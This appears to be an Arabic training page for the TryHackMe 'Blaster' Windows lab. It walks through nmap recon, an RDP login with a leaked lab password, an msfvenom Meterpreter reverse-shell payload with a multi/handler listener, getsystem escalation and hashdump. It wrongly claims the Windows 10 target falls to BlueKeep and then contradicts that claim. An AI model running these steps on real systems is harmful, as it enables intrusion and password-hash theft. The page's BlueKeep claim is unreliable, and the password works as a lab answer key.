Lab: Blaster | STY IT Labs

STY IT Labs · TryHackMe Room

Lab: Blaster
Windows CVE Exploit

اختراق Windows 10 عن طريق CVE-2019-0708 (BlueKeep) — ثغرة RDP خطيرة تُستغل بدون credentials، مع Privilege Escalation ونشر الـ backdoor.

Easy Difficulty CVE-2019-0708 BlueKeep RDP Metasploit PrivEsc Persistence

ابدأ اللاب المهام

BLASTER

DifficultyEasy

Duration1 – 2 ساعة

Tasks4 مهام

XP Points260 XP

PlatformTryHackMe

OSWindows 10

عن اللاب

Blaster هو لاب Windows exploitation مبني على استغلال CVE-2019-0708 (BlueKeep) — ثغرة خطيرة في الـ RDP أثّرت على ملايين الأجهزة وبتسمح بتنفيذ كود عن بُعد بدون أي credentials.

هتبدأ بـ Nmap لتأكيد إن الـ RDP شغال على port 3389، ثم تستخدم Metasploit مع module خاص لـ BlueKeep للحصول على Meterpreter shell، وبعدين تعمل Privilege Escalation وتنشر Backdoor لضمان الـ persistence.

BlueKeep يشتغل فقط على Windows XP / Vista / 7 / Server 2003-2008 — Windows 10 محتاج طريقة مختلفة في اللاب ده.

Blaster Badge

أكمل اللاب واحصل على الـ Badge الرسمي — أضفه لملفك على LinkedIn

مسار الهجوم

Recon — Nmap Scan

فحص الـ ports — هتلاقي RDP على port 3389 وwebserver على port 80

port 3389 RDPport 80 HTTP

Web Recon — Find Credentials

تصفح الـ website على port 80 — هتلاقي username اسمه Wade في الـ content

user: Wade

RDP Login — Windows Access

تسجيل دخول بـ RDP مع user Wade — الـ password بتلاقيه من نص الـ website

rdesktop MACHINE_IP

PrivEsc — Windows Exploit Suggester

داخل الـ RDP، ابحث عن PrivEsc بـ winpeas.exe أو PowerShell

winpeasCVE-2019-1458

Backdoor — Metasploit Handler

نشر msfvenom payload وتشغيل handler للحصول على SYSTEM Meterpreter

msfvenomSYSTEM shell 🏆

مراحل اللاب

Nmap Scan

Web Recon

RDP Login

PrivEsc

Backdoor

SYSTEM 🏆

Commands Cheat Sheet

الأمر	الوصف	المرحلة
nmap -sV -sC <IP>	فحص الـ ports والـ services	Recon
xfreerdp /u:Wade /p:<pass> /v:<IP>	اتصال RDP بـ xfreerdp	RDP
rdesktop -u Wade <IP>	اتصال RDP بـ rdesktop	RDP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=4444 -f exe > shell.exe	إنشاء Meterpreter payload	Backdoor
use exploit/multi/handler → set payload → run	تشغيل Metasploit listener	Backdoor
getsystem	محاولة رفع الصلاحية لـ SYSTEM	PrivEsc
getuid	التحقق من الـ user الحالي	Info
hashdump	استخراج هاشات كلمات المرور	Loot

المهام والأسئلة

Task 1 — Deploy & Recon

nmap scan · port 3389 RDP · port 80 HTTP · version info

+60 XP

Task 2 — Gain Access

Browse port 80 · find Wade's username · RDP login · explore desktop

+80 XP

Task 3 — Privilege Escalation

winpeas / exploit suggester · CVE-2019-1458 · getsystem

+60 XP

Task 4 — Post Exploitation

msfvenom payload · multi/handler · SYSTEM Meterpreter · hashdump

+60 XP

▶ أدخل الـ Flag الخاص بمهمتك الحالية

Terminal — Blaster Attack

root@kali — Blaster

# ── Recon ────────────────────────────────────

└─# nmap -sV -sC 10.10.X.X

80/tcp open http Microsoft IIS 10.0

3389/tcp open ms-wbt-server (RDP)

# ── RDP Access ───────────────────────────────

└─# xfreerdp /u:Wade /p:parzival /v:10.10.X.X

[INFO] Connected to 10.10.X.X — Welcome, Wade!

# ── msfvenom Payload ─────────────────────────

└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.X.X.X LPORT=4444 -f exe > shell.exe

Generated payload: shell.exe (73802 bytes)

# ── Metasploit Handler ───────────────────────

msf6 > use exploit/multi/handler

msf6 > set payload windows/meterpreter/reverse_tcp

msf6 > set LHOST 10.X.X.X → run

[*] Meterpreter session 1 opened

meterpreter > getsystem

...got system via technique 1 (Named Pipe)

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

└─#

المهارات المكتسبة

Windows CVE Exploit

RDP Exploitation

msfvenom Payloads

Metasploit Handler

Windows PrivEsc

Credential Hunting

Persistence

Hash Dumping

الأدوات المستخدمة

nmapPort & Service Discovery

xfreerdp / rdesktopاتصال Remote Desktop

msfvenomإنشاء Meterpreter payloads

Metasploit (multi/handler)استقبال الـ reverse shell

winpeas.exeWindows Privilege Escalation Scanner

ارفع الـ shell.exe للـ target عن طريق الـ RDP session (copy-paste أو SMB) وشغّله من هناك.

تقدمك في اللاب

25%PROGRESS

1 / 4 مهام مكتملة

ابدأ اللاب على TryHackMe شوف الـ Writeup تحميل Cheat Sheet

تحتاج TryHackMe VPN أو AttackBox · Windows 10 target

Hints

Hint 1 — Find Password−10 XP

Hint 2 — RDP Command−20 XP

Hint 3 — Meterpreter Setup−20 XP

Labs مشابهة

🧊

ICE

Easy/Med · TryHackMe

RootMe

Easy · TryHackMe

Metasploit: Intro

Easy · TryHackMe

Lab: BlasterWindows CVE Exploit

عن اللاب

Blaster Badge

مسار الهجوم

Recon — Nmap Scan

Web Recon — Find Credentials

RDP Login — Windows Access

PrivEsc — Windows Exploit Suggester

Backdoor — Metasploit Handler

مراحل اللاب

Commands Cheat Sheet

المهام والأسئلة

Task 1 — Deploy & Recon

Task 2 — Gain Access

Task 3 — Privilege Escalation

Task 4 — Post Exploitation

Terminal — Blaster Attack

المهارات المكتسبة

الأدوات المستخدمة

تقدمك في اللاب

Hints

Labs مشابهة

ICE

RootMe

Metasploit: Intro

Lab: Blaster
Windows CVE Exploit